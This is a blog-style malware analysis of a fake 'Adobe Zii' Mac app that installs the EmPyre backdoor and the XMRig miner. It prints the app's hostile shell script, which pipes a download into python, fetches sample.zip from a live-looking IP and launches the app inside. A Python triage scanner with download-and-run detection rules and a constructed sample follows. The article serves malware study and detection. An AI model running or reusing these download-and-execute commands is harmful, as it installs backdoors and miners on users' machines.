Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools, the EmPyre backdoor and the XMRig cryptominer, for the purpose of evil.

The malware was being distributed through an application named Adobe Zii. Adobe Zii is software that is designed to aid in the piracy of a variety of Adobe applications. In this case, however, the app was called Adobe Zii, but it was definitely not the real thing.

As can be seen from the above screenshots, the actual Adobe Zii software, on the left, uses the Adobe Creative Cloud logo. (After all, if you're going to write software to help people steal Adobe software, why not steal the logo, too?) The malware installer, however, uses a generic Automator applet icon.

Opening the fake Adobe Zii app with Automator reveals the nature of the software, as it simply runs a shell script:

    curl | python - &
    s=46.226.108.171:80
    curl $s/sample.zip -o sample.zip
    unzip sample.zip -d sample
    cd sample
    cd _MACOSX
    open -a sample.app

This script is designed to download and execute a Python script, then download and run an app named sample.app.
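For triage, the shell script inside an Automator applet like the one described above can be read without launching it. The following is an added example, not code from the original article: it assumes the applet keeps its workflow in `Contents/document.wflow` as a property list whose shell actions store their text under `COMMAND_STRING`, and the rule names, sample workflows and the 192.0.2.10 host are constructed for illustration.

```python
import plistlib
import re

# Heuristics for the behaviours the article's script shows (rule names are this example's own).
RULES = {
    "pipe-download-to-interpreter": re.compile(
        r"\b(curl|wget)\b[^|;&\n]*\|\s*(python[\d.]*|sh|bash|zsh|perl|ruby|osascript)\b"),
    "download-to-file": re.compile(r"\bcurl\b[^|;&\n]*\s(-o|--output)\s+\S+"),
    "launch-app-bundle": re.compile(r"\bopen\b[^|;&\n]*\S+\.app\b"),
}

def shell_commands(wflow_bytes):
    """Return the command text of every action that carries a COMMAND_STRING.

    Assumed layout: actions -> action -> ActionParameters -> COMMAND_STRING.
    """
    doc = plistlib.loads(wflow_bytes)
    cmds = []
    for entry in doc.get("actions", []):
        params = entry.get("action", {}).get("ActionParameters", {})
        if isinstance(params.get("COMMAND_STRING"), str):
            cmds.append(params["COMMAND_STRING"])
    return cmds

def scan_workflow(wflow_bytes):
    """Return the sorted names of rules matched by any embedded shell command."""
    hits = set()
    for cmd in shell_commands(wflow_bytes):
        hits.update(name for name, rx in RULES.items() if rx.search(cmd))
    return sorted(hits)

def make_wflow(command):
    """Build a minimal, constructed document.wflow holding one shell action."""
    params = {"COMMAND_STRING": command, "shell": "/bin/sh"}
    return plistlib.dumps({"actions": [{"action": {"ActionParameters": params}}]})

# Constructed samples: same shape as the script in the article, placeholder host.
SUSPICIOUS = make_wflow(
    "curl http://192.0.2.10/stage.py | python - &\n"
    "s=192.0.2.10:80\ncurl $s/sample.zip -o sample.zip\n"
    "unzip sample.zip -d sample\ncd sample\nopen -a sample.app\n")
BENIGN = make_wflow('for f in "$@"; do sips -Z 1024 "$f"; done\n')

if __name__ == "__main__":
    print(scan_workflow(SUSPICIOUS))
    print(scan_workflow(BENIGN))
```

On a real sample, pass the bytes of the applet's `Contents/document.wflow` to `scan_workflow`; any hit is a reason to read the full command text before the app is ever opened.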